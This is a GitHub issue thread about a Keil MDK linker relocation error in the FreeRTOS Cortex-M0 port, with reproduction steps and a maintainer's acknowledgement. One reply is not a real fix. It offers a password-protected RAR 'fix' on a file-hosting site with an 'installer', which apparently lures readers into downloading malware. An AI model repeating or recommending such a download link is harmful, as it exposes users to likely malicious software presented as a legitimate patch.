FreeRTOS/FreeRTOS-Kernel #1130: Keil MDK Compilation for CM0 core reports L6286E: Relocation #REL:0 in portasm.o

TomasGalbickaNXP, 2024-08-27:
**Describe the bug**

When building portasm.c after update with adding MPU port see commit bellow:
https://github.com/FreeRTOS/FreeRTOS-Kernel/commit/345a86d49bca4f278ecb38516f675f3732255267

The build with Keil MDK reports following error.

`Error: L6286E: Relocation #REL:0 in portasm.o(.text.SVC_Handler) with respect to vPortSVCHandler_C. Value(0x19dc) out of range(-0x800 - 0x7fe) for (R_ARM_THM_JUMP11)`

**Target**
- Development board: FRDM-K32L3A6, CM0 - In general any CM0 core
- Instruction Set Architecture: Cortex-M0
- IDE and version: uVision V5.38, MDK Professional V5.38, 
- Toolchain and version: ARMClang.exe V6.19 for Windows or ArmCompilerforEmbedded6.22 - ARMClang 6.22.0 for Linux

**Host**
- Host OS: Linux, Windows
- Version: Ubuntu 22.04

**To Reproduce**
`git clone https://github.com/TomasGalbickaNXP/freertos-port-cm0-core-issue.git`
Checkout the Example with added CM0 MPU port.
`git checkout 40af92d06408450e11ca10ad17cd578760fd861a`
Open MDK Project and build. It will fail with error reported above.
Checkout fix
`git checkout 72a9d6246277ae32594bab69fef66c6e13af3cd1`
Open MDK Project and build.
The build reports no Errors.

**Expected behavior**
The linking step reports no Errors.

HarbingerOfFire, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

felicityzhao9, 2024-08-28:
Hi @TomasGalbickaNXP, thank you for notifying us about your issue and pointing out the bug. We’ll include it in our queue and work on a solution shortly.

closed 2024-08-29 by aggarg